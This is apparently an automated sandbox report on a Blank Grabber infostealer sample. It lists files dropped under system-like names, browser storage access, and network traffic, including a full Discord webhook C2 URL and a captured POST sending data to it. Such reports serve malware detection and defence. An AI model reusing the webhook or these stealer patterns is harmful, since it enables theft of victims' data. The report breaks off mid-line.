                                  Source: based.exe.6900.8.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya"}
                                  Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 71%
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeReversingLabs: Detection: 91%
                                  Source: C:\Program Files\Mozilla Firefox\dwm.exeReversingLabs: Detection: 91%
                                  Source: C:\ProgramData\Microsoft\based.exeReversingLabs: Detection: 55%
                                  Source: C:\ProgramData\Microsoft\hacn.exeReversingLabs: Detection: 70%
                                  Source: C:\ProgramData\setup.exeReversingLabs: Detection: 71%
                                  Source: C:\ProgramData\svchost.exeReversingLabs: Detection: 79%
                                  Source: C:\Recovery\powershell.exeReversingLabs: Detection: 91%
                                  Source: C:\Recovery\winlogon.exeReversingLabs: Detection: 91%
                                  Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exeReversingLabs: Detection: 91%
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeReversingLabs: Detection: 21%
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeReversingLabs: Detection: 75%
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeReversingLabs: Detection: 91%
                                  Source: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpReversingLabs: Detection: 91%
                                  Source: VaTlw2kNGc.exeReversingLabs: Detection: 47%
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeJoe Sandbox ML: detected
                                  Source: C:\Recovery\winlogon.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\svchost.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\Microsoft\hacn.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                                  Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\setup.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Mozilla Firefox\dwm.exeJoe Sandbox ML: detected
                                  Source: C:\Recovery\powershell.exeJoe Sandbox ML: detected

                                  Bitcoin Miner

                                  barindex
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\21b1a557fd31cc
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Mozilla Firefox\dwm.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDirectory created: C:\Program Files\Mozilla Firefox\6cb0b6c459d5d3
                                  Source: VaTlw2kNGc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000004.00000000.1711609232.0000000000956000.00000002.00000001.01000000.00000006.sdmp, Build.exe, 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmp, s.exe, 0000000B.00000003.1750025071.0000000007689000.00000004.00000020.00020000.00000000.sdmp, s.exe, 0000000B.00000000.1741603424.0000000000663000.00000002.00000001.01000000.00000014.sdmp, s.exe, 0000000B.00000002.1764006617.0000000000663000.00000002.00000001.01000000.00000014.sdmp, svchost.exe, 0000000C.00000002.1767211934.0000000000913000.00000002.00000001.01000000.0000001B.sdmp, svchost.exe, 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1758798682.0000000000913000.00000002.00000001.01000000.0000001B.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: based.exe, 00000008.00000002.2653255671.00007FFE130C1000.00000040.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: based.exe, 00000008.00000002.2642370223.00007FFE126EB000.00000040.00000001.01000000.00000015.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2632791212.00007FFE11ED1000.00000040.00000001.01000000.00000017.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: based.exe
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: based.exe, based.exe, 00000008.00000002.2509833770.00007FFDFB705000.00000040.00000001.01000000.0000001E.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: based.exe, 00000008.00000002.2433044590.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: based.exe, 00000008.00000002.2661087553.00007FFE13301000.00000040.00000001.01000000.00000016.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: based.exe, 00000008.00000002.2532291858.00007FFDFB99F000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2647849411.00007FFE12E11000.00000040.00000001.01000000.00000021.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000008.00000002.2610651844.00007FFE11501000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: based.exe, 00000008.00000002.2601619118.00007FFE10301000.00000040.00000001.01000000.00000020.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: based.exe, 00000008.00000002.2642370223.00007FFE126EB000.00000040.00000001.01000000.00000015.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: based.exe, 00000008.00000002.2532291858.00007FFDFB99F000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: VaTlw2kNGc.exe, 00000000.00000003.1701216930.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmp, hacn.exe, 00000005.00000003.1725096795.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1725774568.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1751685629.00007FFE13311000.00000002.00000001.01000000.0000000F.sdmp, based.exe, 00000008.00000002.2660929046.00007FFE13241000.00000002.00000001.01000000.00000011.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2657823913.00007FFE13201000.00000040.00000001.01000000.00000012.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: based.exe, 00000008.00000002.2509833770.00007FFDFB705000.00000040.00000001.01000000.0000001E.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000007.00000002.1750856272.00007FFDFB78F000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: based.exe, 00000008.00000002.2625141523.00007FFE11EB1000.00000040.00000001.01000000.00000019.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: based.exe, 00000008.00000002.2481464532.00007FFDFB67C000.00000040.00000001.01000000.00000022.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: based.exe, based.exe, 00000008.00000002.2532291858.00007FFDFBA21000.00000040.00000001.01000000.0000001D.sdmp

                                  Spreading

                                  barindex
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7691A79B0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A85A0 FindFirstFileExW,FindClose,0_2_00007FF7691A85A0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7691C0B84
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691A85A0 FindFirstFileExW,FindClose,1_2_00007FF7691A85A0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691A79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF7691A79B0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF7691C0B84
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0092C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_0092C4A8
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0093E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_0093E560
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692987F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,5_2_00007FF692987F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692978B00 FindFirstFileExW,FindClose,5_2_00007FF692978B00
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692991FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF692991FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692987F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,5_2_00007FF692987F4C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E2DCE0 FindFirstFileExW,6_2_00000202B6E2DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF7D15479B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15485A0 FindFirstFileExW,FindClose,6_2_00007FF7D15485A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1560B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF7D1560B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE64DCE0 FindFirstFileExW,8_2_00000273EE64DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15485A0 FindFirstFileExW,FindClose,8_2_00007FF7D15485A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00007FF7D15479B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1560B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF7D1560B84
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\extJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefpJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\defJump to behavior

                                  Networking

                                  barindex
                                  Source: unknownDNS query: name: api.telegram.org
                                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                  Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
                                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                  Source: unknownDNS query: name: ip-api.com
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
                                  Source: based.exe, 00000008.00000002.2381451502.00000273EDC74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                  Source: global trafficDNS traffic detected: DNS query: discord.com
                                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                  Source: unknownHTTP traffic detected: POST /api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 693785User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=720bf38bf17272696e0e8c38b6636f8d
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 22:08:04 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=86a67c90505211efa91f02a2205ccffc; Expires=Tue, 31-Jul-2029 22:08:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1722550086x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CBDsglSGZFtmEeHZSaZpu0gKvclv57NsKn2ouq5Wvr%2BKbHhBPUdkKEAjfq36xufpoUjuGflx4Jvyl4mSQSjQ0AG3EvGLr1mEG3nt1AYH%2BJeKO6517B2wOimkuVI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=86a67c90505211efa91f02a2205ccffc9478c4367cc9c36b457f84c079b54cecf5426fcf88478aa68b98437576e030a4; Expires=Tue, 31-Jul-2029 22:08:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=b3a25f467d6e14d2f5864b2062409193ec70586a-1722550084; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                  Source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                                  Source: hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.coH
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: based.exe, 00000006.00000003.1733781417.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1733781417.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF7385F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1732946949.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727175401.00000202B6EAD000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1727769666.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000006.00000003.1726964644.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702643091.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1702259962.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A3D000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725591841.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1753005958.000001BF73860000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735695316.000001BF73853000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1725364630.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1735298945.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1727607675.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726491983.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1729559252.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000005.00000003.1726224998.000001BF73852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 